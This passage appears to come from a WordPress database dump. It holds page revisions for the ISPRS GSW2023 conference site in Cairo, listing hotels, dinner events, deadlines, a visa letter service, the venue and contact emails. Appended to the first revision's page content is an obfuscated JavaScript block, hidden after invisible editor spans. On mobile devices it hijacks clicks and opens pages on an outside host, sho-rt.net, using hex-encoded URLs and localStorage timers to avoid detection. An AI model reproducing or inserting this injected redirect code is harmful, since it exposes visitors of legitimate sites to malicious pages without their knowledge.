width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-autosave-v1','','','2023-09-16 14:34:13','2023-09-16 14:34:13','',3066,'https://gsw2023.com/?p=5478',0,'revision','',0),
(5479,1,'2023-09-16 14:35:43','2023-09-16 14:35:43','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"]<p><a href=\"https://gsw2023.com/wp-content/uploads/2023/09/The Best.pdf\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/09/best.png\" alt=\"\" width=\"487\" height=\"180\" /></a><h4 style=\"text-align: center;\">ISPRS GSW2023 Best Workshop Paper Award</h4></p>\r\n[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<p><a href=\"https://gsw2023.com/wp-content/uploads/2023/09/Best presentation award GSW2023.pdf\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/09/best.png\" alt=\"\" width=\"487\" height=\"180\" /></a><h4 style=\"text-align: center;\">ISPRS GSW2023 Best Presentation Award</h4></p>\r\n[vc_separator style=\"shadow\" 